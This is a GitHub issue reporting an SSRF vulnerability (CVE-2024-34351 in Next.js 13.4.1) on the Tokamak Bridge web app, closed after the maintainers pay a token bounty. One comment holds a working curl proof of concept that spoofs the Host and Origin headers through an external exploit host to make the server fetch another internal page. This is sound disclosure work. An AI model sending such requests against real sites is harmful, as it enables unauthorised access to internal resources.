search

tokamak-network / tokamak-bridge

An interface designed to bridge assets between Titan and Ethereum chains.
https://app.bridge.tokamak.network
6 stars 0 forks source link

[Bugs]: SSRF vulnerability present on "app.bridge.tokamak.network" #242

Closed blackcow1987 closed 3 weeks ago

blackcow1987 commented 1 month ago

Can you specify where the bug exists?

No response

What happened?

The "app.bridge.tokamak.network" is confirmed to be based on NextJS 13.4.1 and the version is vulnerable to CVE-2024-34351. Exploitation of this vulnerability can trigger an SSRF attack via an endpoint that uses redirect, and this vulnerability can be used to access unauthorized internal resources, etc. Therefore, it is recommended to update NextJS to the latest version.

I have identified an endpoint in the Tokamak Bridge code that uses redirect and can be used to trigger a vulnerability. https://github.com/tokamak-network/tokamak-bridge/blob/main/src/app/pools/increase/%5Bid%5D/page.tsx#L23 https://github.com/tokamak-network/tokamak-bridge/blob/main/src/app/pools/remove/%5Bid%5D/page.tsx#L28

A more detailed analysis of this vulnerability can be found at the link below. https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps

Which networks are you seeing the problem on? (can select multiple)

No response

Which device are you seeing the problem on? (can select multiple)

No response

Which OS are you seeing the problem on? (can select multiple)

No response

What browsers are you seeing the problem on? (can select multiple)

No response

Relevant log output

No response

Upload any screenshots to aid with explaining the bug.

Upload image here

blackcow1987 commented 1 month ago 
curl 'https://app.bridge.tokamak.network/staking' \
  -H 'Host: simple.staking.tokamak.network' \
  -H 'Accept: text/x-component' \
  -H 'Accept-Language: ja,en-US;q=0.9,en;q=0.8' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: text/plain;charset=UTF-8' \
  -H 'Next-Action: 1529e716c9db41d5ce462b285ea3d42d09292bd2' \
  -H 'Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D' \
  -H 'Origin: http://nextjs-cve-2024-34351.deno.dev' \
  -H 'Pragma: no-cache' \
  -H 'Referer: https://app.bridge.tokamak.network/pools/increase/3' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
  -H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' -v

Using the above command, you can see that the server reads and returns the /staking page of simple.staking.tokamak.network specified in the Host.

Jaden-Kong commented 1 month ago

@blackcow1987 Hello, this is Jaden from Tokamak Network. After internal discussions, we are planning to reward 100 TON for your vulnerability report. If you okay, please share your ERC20 address to receive the reward. If you have any further questions regarding the reward, feel free to contact me via Telegram at @Jaden_Tokamak.

Thank you.

blackcow1987 commented 4 weeks ago

@Jaden-Kong Wallet address is 0xE59d88eb24dF45e7Ef72B2af0e40714FA3277733

Jaden-Kong commented 4 weeks ago

@blackcow1987 Thank you for sharing this information. I'll take care of it by tomorrow.

Jaden-Kong commented 4 weeks ago

@blackcow1987 Completed 100TON trasnfer via Titan L2.